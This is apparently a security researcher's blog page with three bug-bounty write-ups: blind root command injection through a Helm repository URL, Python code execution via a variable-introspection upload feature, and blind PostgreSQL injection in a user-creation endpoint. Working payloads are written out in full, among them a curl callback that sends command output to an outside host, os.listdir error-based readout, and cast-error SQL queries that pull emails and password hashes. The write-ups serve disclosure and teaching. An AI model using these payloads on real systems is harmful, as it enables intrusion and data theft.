• Twitter
  • FB
  • Github
  • Youtube

About me

Let me introduce myself


A bit about me

i'm Shawar Khan.

With over 4 years of experience, I've identified major security vulnerabilities in the world's well-known companies including Google, Microsoft, Apple, PayPal. Acknowledged by over hundreds of companies and listed in over +100 Halls of Fame.

Profile

Shawar Khan

Personal info

Shawar Khan

A Security Researcher at HackersRay, Bug Bounty Hunter and Top #60 Red Team Member & Synack Acropolis at Synack inc.

Acknowledgements: List Here

Hackerone: View Hackerone profile

BugCrowd : View Bugcrowd profile

Skills & Things about me

Web Application
100%
Penetration Testing
Mobile App
100%
Penetration Testing
Python
100%
Exploit Writing

Write-Ups

My recent research work


Thursday, January 28, 2021

Analysing crash messages to achieve blind root command injection

 



About the Write-up:

Greetings everyone, this is Shawar Khan and today I'm going to share one of my recently discovery which is quite interesting. This is basically a Command injection vulnerability that I found in a Synack target a few days back so I'll try to cover target for client's privacy. I'll be referring the target as redacted.com / Redacted Org.

So, I tested a target on Synack and got some quality reports having IDORs / XSS accepted and I left the program for like a few days. I received a text from a friend who told me he found another IDOR, I was like alright so there are still some vulnerabilities left, I gave the target another try and got some luck.

The Redacted Org had different roles and allowed users to add Helm repositories which were further used for retrieving charts in some functionalities. Helm is a package manager for Kubernetes and allows installation and upgrading of Kubernetes application.


Keeping track of everything:

I'll try to cover common questions that I'm mostly asked in this write-up as well one of which is how I start testing an application. Whenever I'm testing an application my first step is to map all the functionalities available in an application. This includes mapping all the functions from the UI and functions/endpoints that are found from JS files. Keeping Burp Suite connected all the time helps tracking and extracting endpoints and pages properly.

After this step, I try to use and fiddle every functionality to collect different responses and behaviors which I can later observe and analyze from Burp History.

Analyzing repository management feature:

The application was having a Settings page which allows authenticated users to add Helm repositories. The page was taking inputs such as URL, name, username, password and some other fields. 



At that moment I tried to test for SSRF but as soon as I clicked Saved, nothing happened. I thought there might be some function which would use this repository for performing actions such as retrieving repository and installing applications from our specified repository. At this point I used a remote host having Apache service running to see if I can retrieve any ping backs. I named my repo zzzztest123.

Finding features that uses Helm Repository:

After exploring the application and checking each and every feature I came across a feature that allows a user to create applications so I created a test application named anythinghere1:



After scrolling down on the application page, I found a feature that had the title Charts and this was obvious that It was used for loading charts from a specified repository. I tried using my repository name zzzztest123 with an invalid chart name to see how the application responds.





This feature was quite a mess because if the application is newly created and this feature is used, a request is sent to https://redacted.com/api/sd/catalog/applications/helm but If the feature is used multiple times then requests are made to https://redacted.com/api/sd/catalog/applications/{APPLICATION_ID} where both endpoints are different and are having different request structure and parameters.

Every time I had to change something, I had to recreate an application and perform the same task as mentioned.

So, I used and invalid chart and got the following response:



This error message was fod when I analyzed my burp history, this application didn't shown any visual error or any warning to inform if an error occurred which was quite weird. I properly checked the error message to see whats causing it and found this line:


], 
"operatormessage": [
"CLI Error: \"Ds_chart not found\" It happens when the provided chart is not valid (the system cannot locate it)"
],
"result": "PARTIAL_SUCCESS",
"customermessage": [
"[HELM-001] Chart anythinghere1/sdfasdfdsafa not found"
],
"servicename": "MEC_woot_Catalog_awjiopwoefir_1_HelmChart"
}



What I did next was I created a valid chart and replicated the same request again but got a 201 response but no crash message. I felt something was fishy as the application was quite verbose and was returning huge crash messages. I tried everything to make it crash somehow and analyze error messages.

By simply putting a chart name a request is made from server that tries to receive a file index.yaml and if its a valid file the application returns 201 but If the file is not found the application returns the chart not found error.

I discovered a rare condition which was the main discovery point of this discovery. If we place an empty index.yaml with no content, the application loads a index.yaml but gets in a situation which was not excepted and returns the following error message:

 "result": "PARTIAL_SUCCESS", 
"customermessage": [
"[HELM-011] CLI Error: \"GLOBAL.GenericCLI_Activate(DO_AND_CHECK, ssh://127.0.0.1,
<?xml version=\"1.0\" encoding=\"UTF-8\"?>
<!DOCTYPE CLI SYSTEM \"CLIv4.dtd\">
<CLI dumpDialog=\"yes\">
<Connect protocol=\"ssh\" ssh.allow_host=\"true\" ssh.identity=\"-\" ssh.isEncrypted=\"yes\" ssh.known_hosts=\".ssh/known_hosts\" ssh.password=\"OzTDoyJMLUSREDACTEDA+681rQ==\" ssh.username=\"root\">
<Do description=\"Empty command to speed up connection\">
<Command send_newline=\"no\"/>
<Prompt>.*\\# *$</Prompt>
</Do>
</Connect>
<Disconnect continuationDelay=\"5000\">
<Do description=\"Initiate disconnect\" timeout=\"1\">
<Command continuationDelay=\"5000\" newline_chars=\"\\n\">
exit
</Command>
</Do>
</Disconnect>
<Activate>
<Action description=\"Add Helm repository\">
<Do timeout=\"600\">
<Command newline_chars=\"\\n\">helm repo add zzzztest123 http://myprivatehost.com/</Command>
<Error message=\"Chart repository unauthorized, check username and password.\">
Error.*is not a valid chart repository or cannot be reached.*401 Unauthorized</Error>
<Error message=\"Chart repository not found.\">Error.*is not a valid chart repository or cannot be reached</Error>
<Error message=\"Incorrect protocol defined in repository url.\">
Error.*could not find protocol handler</Error>
<Prompt>.*\\# $</Prompt>
</Do> </Action>
</Activate>
<Rollback>
<Rewind/>
</Rollback>
</CLI>
) : Matched error pattern - command description: [Add Helm repository]
...
...
...



I was quite shocked to see such message as I noticed multiple issues here. The first thing I noticed was the disclosure of  root user password. The application uses CLIv4.dtd file and was an XML request but before that the application connected to SSH on localhost which was indicated by ssh://127.0.0.1. It was like the server tried to connected to localhost and executed a command. In the Command entity I found

helm repo add zzzztest123 http://myprivatehost.com

it was quite weird to see zzzztest123 which is our repository name and the URL I used in the Helm Repository management feature located in the setting. The entities were being used as positional arguments to helm repo add command which was used to add a specific repository to the system. What cause the issue here is how the user-controlled data was passed directly as command without being filtered or something.

Confirming Command Injection:

At this point, I had two options. I could use a command injection payload as repository name or as a URL. This was not possible directly as the repository management page was not allowing special characters so by sending a valid format and tampering parameters I could use special characters to use my payload. 

What I need was to execute another command and the followings were the possibilities:

http://validrepo.com && whoami
http://validrepo.com; whoami 
http://validrepo.com || whoami 

I tried the last one as that would ignore the exception from the first command if it occurs but it runs the second command properly if executed. I tried to see if i could get result of  whoami command somehow.

After setting my repository URL to http://myprivatehost.com || whoami all I got was a 201 response without any kind of command output. At this point I was sure my command was run internally but didn't shown any output as the application was only programmed to handle specific response and if everything goes well it returns 201 so I treated this as a Blind Command Injection.

Got Blind? ... CURL!

I tried running curl to send output of whoami command to my external host to see if my command is being executed blindly. I set my repo URL to "http://anyvalidrepo.com/ || curl http://myprivatehost:80/`whoami`" as this would execute `whoami` command which is wrapped in back-ticks and would sent the result to my private server having apache running.




Created a new application, loaded my new repo, and bingo!




A request was sent to my host at /root where root was the result of whoami command which was executed on the vulnerable application. This confirmed the vulnerability and got accepted in no time!






Conclusions:

Never ignore or skip a target if its tested by many other researchers as most of them would not go to each and every detail as most of the people are rushing for finding common vulnerabilities. Always look for something different unique which no one could though of. Stay persistent when hunting a target as this is the key to success.


You can't expect a bounty rain by putting same efforts as everyone else, think out of the box and go one step further! - Shawar Khan



Wednesday, January 6, 2021

Achieving Remote code execution by exploiting variable check feature

 


Greetings everyone, this is Shawar Khan and this is the first write-up of 2021 so pretty excited to share this discovery with you people. Recently, while hunting on Synack I came across a program having a quality rule so my focus was on finding something unique and better quality. I'll refer the target as redacted.com.

 The application was some kind of interface builder and allowed uploading of files such as .py , .txt , .ctx2 and some others which were further used for building a template for interface builder. There were some file upload areas where the template can be uploaded such as the one below:

 

 

Model files having .py, .ctx2 and .txt extensions.

The model section allowed uploading of such extensions having any content. Opening the file directly does not show any kind of execution. However, if the Interface Builder is accessed which is located at https://redacted.com/endpoint/builder/#/author1/testpriject8 the application asks for a model to be loaded. 

I was thinking that this isn't common to see a .py extension being allowed. During these kind of scenario, what I mostly try is to know how the application is processing these files and what are the things which we can control to achieve something and to get something that's normally not possible.

I captured the request that makes changes to the uploaded python model file so I can try to make changes and see results in repeater:

POST /endpoint/author1/testpriject8/model/new-file HTTP/1.1
Host: redacted.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:83.0) Gecko/20100101 Firefox/83.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 165
Connection: close
Cookie: COOKIES
Upgrade-Insecure-Requests: 1

projectPath=author1%2Ftestpriject8&category=model&directoryPath=&name=test.py&blob=pythoncontent



The blob parameter was holding content of the model file so I kept this request in the repeater. So, after navigating to Interface Builder and selecting my python model file, I noticed a request being made to https://redacted.com/v2/model/introspect/author1/testpriject8/test.py

This was the request sent after selecting test.py model file so after checking the response of this GET request, I got the following response:

HTTP/1.1 200 OK
Server: openresty/1.19.3.1
Date: Mon, 07 Dec 2020 15:31:55 GMT
Content-Type: application/json
Content-Length: 49
Connection: close
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: Authorization, Content-Type, Range, X-Autorestore, X-Forio-Confirmation, X-Timeout
Access-Control-Expose-Headers: Content-Range, Content-Type, Range, X-Forio-Redirect
Access-Control-Allow-Methods: DELETE, GET, HEAD, OPTIONS, PATCH, POST, PUT
Access-Control-Allow-Credentials: true
Cache-Control: no-cache, no-store

{"functions":null,"ranges":null,"variables":null}



This was something weird as it returned a JSON response having the words functions, ranges and variables set to null. I guessed this was null as none of them exists in my file content which was submitted as pythoncontent


What I tried next was uploading a python file having the following content s=1337 and the application sent the following response:

{
    "variables": [
        {
            "access": "ALWAYS", 
            "ranges": null, 
            "saved": false, 
            "dataType": "NUMBER", 
            "units": null, 
            "name": "s", 
            "formula": null, 
            "maximum": null, 
            "comment": null, 
            "minimum": null
        }
    ], 
    "functions": null, 
    "ranges": null
}



Till this point I was sure that this was a variable extraction feature. What this was doing is extracting all the available variables, functions and ranges from an uploaded python file and was using them for further processing of a template model. 


I tried using a code which makes a reference to woot variable which didn't exist in a code. So I sent the value of blob as blob=print(woot) and got the following response:

{
    "type": "python", 
    "message": "NameError: name 'woot' is not defined", 
    "trace": [
        {
            "line": 68, 
            "type": "python", 
            "file": "/usr/local/lib/python2.7/dist-packages/REDACTED/worker/python/python_worker.py", 
            "function": "load_model"
        }, 
        {
            "line": 55, 
            "type": "python", 
            "file": "/usr/local/lib/python2.7/dist-packages/REDACTED/worker/abstract_worker.py", 
            "function": "load_module"
        }, 
        {
            "line": 37, 
            "type": "python", 
            "file": "/usr/lib/python2.7/importlib/__init__.py", 
            "function": "import_module"
        }, 
        {
            "line": 1, 
            "type": "python", 
            "file": "/home/user/model/REDACTED/test.py", 
            "function": "module"
        }
    ], 
    "information": {
        "code": "MODEL_INITIATION", 
        "runKey": "REDACTED"
    }
}

This was a python exception caused due to no declaration of woot variable and this is the same exception that is returned when a command such as print(woot) is used in a python console:


At this point I was sure my code is being executed but after some tests I knew there were some conditions on which the input is executed. If the application contains any variables or something and there are no exceptions, the application returns all the available variables and data. But if the application contains any exception, it is returned instead of the results.

Now what I needed to do was to get an exception that will have any of my command. I tried using the following code to see if I can execute it:

import os
os.system('ls')


uploading this code and making a request to https://redacted.com/v2/model/introspect/author1/testpriject8/test.py returned the following response:

{
    "variables": [
        {
            "access": "ALWAYS", 
            "ranges": null, 
            "saved": false, 
            "dataType": "OBJECT", 
            "units": null, 
            "name": "os", 
            "formula": null, 
            "maximum": null, 
            "comment": null, 
            "minimum": null
        }
    ], 
    "functions": null, 
    "ranges": null
}


This confirmed the command was executed blindly but as this was an object, it was returned as JSON response so I had to obtain data somehow. As the last step the application does is returning all the data after executing it. I tried to make an exception that returns the result of an executed command. By converting an output of a command to string using str() and by converting it to integer using int() the application will cause a ValueError that will return the result of an executed command.


I made the following request having blob set to blob=import+os;int(str(os.listdir('/etc/'))) which will list all the files/dirs under /etc/ directory and converted the output to string and integer:

sadfas


POST /endpoint/author1/testpriject8/model/edit/test.py HTTP/1.1
Host: redacted.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:83.0) Gecko/20100101 Firefox/83.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 114
Connection: close
Cookie: COOKIES
Upgrade-Insecure-Requests: 1

projectPath=author1%2Ftestpriject8&category=model&filePath=%2Ftest.py&blob=import+os;int(str(os.listdir('/etc/')))

 

And now after making a request to Introspect endpoint, I got the following response:

{
    "type": "python", 
    "message": "ValueError: invalid literal for int() with base 10: \"['rc2.d', 'gai.conf', 'ld.so.cache', 'issue', 'rc0.d', 'bindresvport.blacklist', 'default', 'update-motd.d', 'rmt', 'group', 'gshadow', 'deluser.conf', 'machine-id', 'ld.so.conf.d', 'profile', 'skel',\"", 
    "trace": [
        {
            "line": 68, 
            "type": "python", 
            "file": "/usr/local/lib/python2.7/dist-packages/redacted/worker/python/python_worker.py", 
            "function": "load_model"
        }, 
        {
            "line": 55, 
            "type": "python", 
            "file": "/usr/local/lib/python2.7/dist-packages/redacted/worker/abstract_worker.py", 
            "function": "load_module"
        }


Command executed! and the output was rc2.d', 'gai.conf', 'ld.so.cache', 'issue', 'rc0.d', 'bindresvport.blacklist', 'default', 'update-motd.d', 'rmt', 'group', 'gshadow' which were the available files in /etc/ of the vulnerable application.


I submitted the best quality report to Synack and won the quality with 3/3 stars. However I asked for permission for further exploitation but was denied so I didn't proceeded further. 



Whenever you are testing an application for such issues, always try to understand how the application is handling user provided data. There might be multiple endpoints that performs different tasks on an uploaded files such as the one in this case was checking for variables but was blindly executing arbitrary commands without any errors or outputs. 

There were some other vulnerabilities identified as well which could be chained with this and could allow any unauthenticated user to perform this RCE. However, due to lack of time I wasn't able to make it up to that exploit.

If you like this write-up, Share!

Monday, November 30, 2020

Exploiting blind PostgreSQL injection and exfiltrating data in psycopg2

  



    Greetings everyone this is Shawar Khan and its been a while since my last write-up. After being quite busy with Synack, there have been some interesting discoveries and I'm going to share one of them today. 

There are a lots of new things I want to share but at the moment I'm going to disclose one of my recent finding in a web application developed in Python. This was a program on Synack so I'll referrer to the target as redacted.com or Redacted Org

The target was in Quality rule which means the best quality report wins so my focus was on writing the best report with maximum impact. 

 Setting up scope:

I started by setting up scope as there were specific endpoint allowed such as staging.sub.redacted.com/endpoint/:


Setting up Advanced Scope

Ticking "is in target scope" for collecting only relevant traffic.

The option is in target scope was ticked so only scoped domains will be intercepted.

Understanding application work flow:

The functionality in staging.sub.redacted.com was quite limited and after analyzing traffic in Burp Suite History, I observed that there is a single endpoint that is responsible for making changes and updates to web pages. An endpoint at staging.sub.redacted.com/endpoint/_dash-update-component was discovered which was receiving a lots of POST requests and each of them had unique JSON response. This confirmed the endpoint can handle different data and was containing different functionalities.


The application had two roles named Admin & User. The admin user was able to add new users to the application and make some changes and later I found privilege escalation that allowed me to create new users from a user privileged account. 


The user creation was done by _dash-update-component as well and was having the following request:

 POST /endpoint/_dash-update-component HTTP/1.1
Host: staging.sub.redacted.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:82.0) Gecko/20100101 Firefox/82.0
Accept: application/json
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json
X-CSRFToken: undefined
Origin: https://staging.sub.redacted.com
Content-Length: 710
Connection: close
Cookie: REDACTED

{"output":"createUserSuccess.children","outputs":{"id":"createUserSuccess","property":"children"},"inputs":[{"id":"createUserButton","property":"n_clicks","value":1},{"id":"newUsername","property":"n_submit","value":0},{"id":"newPwd1","property":"n_submit","value":0},{"id":"newPwd2","property":"n_submit","value":0},{"id":"newEmail","property":"n_submit","value":0}],"changedPropIds":["createUserButton.n_clicks"],"state":[{"id":"newUsername","property":"value","value":"test1"},{"id":"newPwd1","property":"value","value":"test123123123"},{"id":"newPwd2","property":"value","value":"test123123123"},{"id":"newEmail","property":"value","value":"test@test.com"},{"id":"role","property":"value","value":"dp"}]}

This request above had the following response which confirms a new user is created:

HTTP/1.1 200 OK
Date: Fri, 20 Nov 2020 20:53:18 GMT
Content-Type: application/json
Content-Length: 192
Connection: close

{"response": {"createUserSuccess": {"children": {"props": {"children": ["New User created"], "className": "text-success"}, "type": "Div", "namespace": "dash_html_components"}}}, "multi": true}

I was testing this feature for more vulnerabilities and I tried to send the same request again and received the following response:

HTTP/1.1 200 OK
Date: Fri, 20 Nov 2020 20:53:12 GMT
Content-Type: application/json
Content-Length: 350
Connection: close

{"response": {"createUserSuccess": {"children": {"props": {"children": ["New User not created: (psycopg2.errors.DuplicateSchema) schema \"test1\" already exists\n\n[SQL: CREATE SCHEMA test1]\n(Background on this error at: http://sqlalche.me/e/f405)"], "className": "text-danger"}, "type": "Div", "namespace": "dash_html_components"}}}, "multi": true}

I tried to create test1 user again and received an error message stating New User not created: (psycopg2.errors.DuplicateSchema) schema \"test1\" already exists\n\n[SQL: CREATE SCHEMA test1] . The error seems to be a Python exception which occurred due to lack of try/except. If try/except are used as except(Exception) the application does not return any exception which was not the case here.

The python module being used here was psycopg2 which I was not familiar with. So I searched for this module and found that this was a database adapter module for PostgreSQL database which confirms the application was running a PostgreSQL database. Moreover, the exception leaked a query CREATE SCHEMA test1 and this was shocking as test1 was the username I provided. This confirmed my input was directly passed to a SQL query after being retrieved from newUsername object's value.

What I did was applied sqlmap on a specified location with risk & level 3 which unfortunately failed. I knew if there is an SQL injection I'd have to go for manual exploitation rather than depending on automated exploitation. 

Proceeding with manual exploitation:

Till this point I was sure of the SQL injection due to the fact that if a username is created as testuser1;TEST the application will create a user with name testuser1 but will throw a syntax error which confirmed the TEST was separately executed as a query.

New User not created: (psycopg2.errors.SyntaxError) syntax error at or near \"TEST\"\nLINE 1: CREATE SCHEMA testuser1;TEST...\n
   

After putting single or double quotes the application responded with unclosed quotation errors which confirms our input was not wrapped inside quotes which was obvious anyway. In order to execute a new query the first query has to be first closed using ; so I tried creating a username as test1 AND SELECT version() and the application converted the spaces to _ so my username became test1_and_select_version() which didn't worked.

A simple bypass worked which was using comments instead of spaces. I converted all the spaces to /**/ but ended up having the same issue. Upon further tests, I found other unique bypasses that can be used to enter white spaces. In python, characters such as \n , \r or \t can be used for new lines and tabs and I was able to use them as separators of queries. This worked as the application was using python.

However, I was responded with two cases and either the application created a new user or returned error message and non of those cases were having a result of version(). The second query works if the first query executes so has to make sure the user does not exists else the query will fail.

I was running out of time for quality rule so I tried to see if I was able to enumerate tables, before that I tried to use a large string such as

test111111;SELECT/**/tessssooooooooooooootessssoooooooooooooooooooooooooooooooooooooooo; 
and the application returned an error message which disclosed the following query:

INSERT INTO userdata (username, email, password, roles) VALUES 
(%(username)s, %(email)s, %(password)s, %(roles)s) RETURNING 
userdata.id]\n[parameters: {'username': 
'test111111;SELECT/**/tessssooooooooooooootessssoooooooooooooooooooooooooooooooooooooooo;',
 'email': 'woot@woot.com', 'password': 
'sha256$QY0iWLnG$17f.......',
 'roles': 'dp'

The error message returned was New User not created: (psycopg2.errors.StringDataRightTruncation) value too long for type character varying(80) after reading the error I found the application is having a character limit of 80 which shown we had limitations.

I was familiar with concatenation bypasses but all other endpoints was not returning values unfiltered or directly placed as most of them were wrapped in quotes which were properly escaped so concatenation bypasses were not of use.

From the disclosed query I found the columns of a table userdata which was having all registered users and I noted this for later. 

I was running out of time so I proceeded to enumeration of table names. By using the query test1111;SELECT/**/version/**/from/**/existornot; I was able to identify if a table exists or not. If a table does not exists, the application return the error message psycopg2.errors.UndefinedTable) column \"existornot\" does not exist & if the table exists, the application returns psycopg2.errors.UndefinedColumn) column \"version\" does not exist message which shows if a column exists or not.

After trying every query and bypass I was not able to retrieve information even after using SELECT statement and everything ended up with syntax error or user created error. This was done due to third query I believe which was broken after escaping from CREATE SCHEMA context.

I reported this vulnerability as limited blind SQL injection and with possibility of enumeration of tables and columns and asked permission for further exploitation. It is always a best thing to ask for permission before accessing something as this can cause trouble if done without permission. 

Won the Quality Rule! Now what?:

Luckily my report was selected as winner of Quality Rule:

Won the quality rule!

Finally, My report won the quality rule and I was given permission for further exploitation.  During my tests, I found something quite interesting and it was how the application was providing hints on available columns and tables. I used the query teb2;SELECT/**/password/**/from/**/pg_user; and the application responded with:

{
    "multi": true, 
    "response": {
        "createUserSuccess": {
            "children": {
                "type": "Div", 
                "props": {
                    "className": "text-danger", 
                    "children": [
                        "New User not created: (psycopg2.errors.UndefinedColumn) column \"password\" does not exist\nLINE 1: CREATE SCHEMA t12;SELECT/**/password/**/from/**/pg_user;\n                                    ^\nHINT:  Perhaps you meant to reference the column \"pg_user.passwd\".\n\n[SQL: CREATE SCHEMA t12;SELECT/**/password/**/from/**/pg_user;]\n(Background on this error at: http://sqlalche.me/e/f405)"
                    ]
                }, 
                "namespace": "dash_html_components"
            }
        }
    }
}

The application provided a message HINT:  Perhaps you meant to reference the column \"pg_user.passwd\" which disclosed the available column passwd which was similar to password so the application discloses similar columns or tables as well which was a plus point when performing enumeration.

Using type casting to access information:

During my past years, I studied about something related to type casting where user input is converted to a type which is not possible and that discloses information being retrieved. So as we were not able to retrieve any data at the moment, I studied about something related to type casting and type conversion and found that PostgreSQL has a function named CAST() which can be used for converting types of data. In order to cause exception I wanted to convert a column to INTEGER so it would disclose information.

I tried this experiment in order to retrieve current DB version using the query test11a1111;SELECT/**/CAST(version()/**/AS/**/INTEGER); and BOOM!:

Disclosed database version()

I received a response with the string PostgreSQL 12.3 on x86_64-pc-linux-gnu, compiled by gcc (GCC) 4.8.3 20140911 (Red Hat 4.8.3-9), 64-bit which was caused due to conversion of data type to Integer. That was the moment I realized this is It and I've to proceed further with something big ( didn't knew what challenges I was about to face, lol ).

Using CAST() was something I was having trouble with as I had limited 80 chars input and using a query with  CAST() I made a query up to 45 chars:

>>>
>>> len("t;SELECT/**/CAST(version()/**/AS/**/INTEGER);")
45
>>>

After searching on google for alternative use of CAST() I found that it is possible to convert data types just by using ::int which is way too shorter as compared to the previous query. The query  t;SELECT\nversion()::int returns the same response but has lower character length.

>>> len("t;SELECT\nversion()::int")
23
>>>

Using \n instead of /**/ and using ::int instead of CAST() saved a lot of character length which helped me for further exploitation.

I was able to obtain single values from commands such as version(), current_user and others and now it was time to retrieve table information.

Obtaining table information:

Next I wanted to retrieve all the available table names and in order to do that I tried to access pg_catalog.pg_tables which holds all the available table names. I used the query tc;SELECT\n(select\ntablename\nfrom\npg_catalog.pg_tables\nlimit\n2)::integer and received the following response:


I recieved an error  New User not created: (psycopg2.errors.CardinalityViolation) more than one row returned by a subquery used as an expression\n\n[SQL: CREATE SCHEMA which stated that more than one row is not allowed. If a query is returning a list of databases, the application does not shows them due to some violation of Cardinality. 

I tried using limit and offset so I could retrieve specific rows and limited the input to a single row and it worked! I was able to retrieve the table name userconfig:

Using the query tc;SELECT\n(select\ntablename\nfrom\npg_catalog.pg_tables\nlimit\n1\noffset\n3)::integer returned the output above. This was a limited case as well as the max table length that was possible was 13 and I wanted to List all the available tables:


>>> len("tc;SELECT\n(select\ntablename\nfrom\npg_catalog.pg_tables\nlimit\n1\noffset\n3)::integer")
80
>>> len("tc;SELECT\n(select\ntablename\nfrom\npg_catalog.pg_tables\nlimit\n1\noffset\n3)::int")
76


Character limit? Row limit? Seriously...:

I googled for techniques and methods I could use to convert multiple rows into a single one and I was looking for something similar to group_concat without using much character length. After some research I came up with array_to_string & array_agg. For converting all the returned rows I used array_agg as this returns an array and in order to convert the array to a string I used array_to_string. Using the query b2;select\narray_to_string(array_agg(datname),',')::int\nfrom\npg_database; I was able to obtain the list of available database names:


For retrieving table list I tried to access pg_tables using the query b2;select\narray_to_string(array_agg(tablename),',')::int\nfrom\npg_tables; which has a length of 72:

We already knew the columns and table name userdata which was found by a query disclosure, how about accessing that for proof that user data can be accessed?

How about a little row of user data?

Length limit was still an issue but still I was able to retrieve all the available databases, tables and columns. By using the query t3;SELECT\n(select\nemail\nfrom\nuserdata\nlimit\n1\noffset\n5)::int the application returned the email address for user at offset 5, I used offset as I didn't wanted to dump the entire table having hundreds of users:

 



For retrieving user password I used t3;SELECT\n(select\npassword\nfrom\nuserdata\nlimit\n1\noffset\n5)::int which returned a SHA256 hash:


 

Wrapping it up!:

So, thats It! All information accessed and I was able to DROP, CREATE and Modify any table by exploiting this vulnerability. For all people out there spending time learning new stuff or doubting their skills when not finding any vulnerabilities , just remember that everything comes with persistence and consistency. Without these you won't be able to achieve anything, If you are willing to do something you can do it no matter how tough it looks. If you are persistent and dedicated, you can achieve anything. 

At the time of report I though this is limited to table and column enumeration but after spending 11 hours of exploitation and testing I was able to achieve the max however due to lack of privileges I was not able to get system access but I got what I wanted.

 


 

 Let me know in the comments If you love this write-up, share if this helped learning new techniques!

 



Services

What can I do


Web-App Penetration Testing

Provides a complete Penetration Test against the web application in order ensure its safety.

Android App Penetration Testing

Provides Android Application Penetration Testing in order to make the app & secure.

iOS App Penetration Testing

Provides iOS Application Penetration Testing in order to make the app & secure.

Want to contact?

Get in touch with me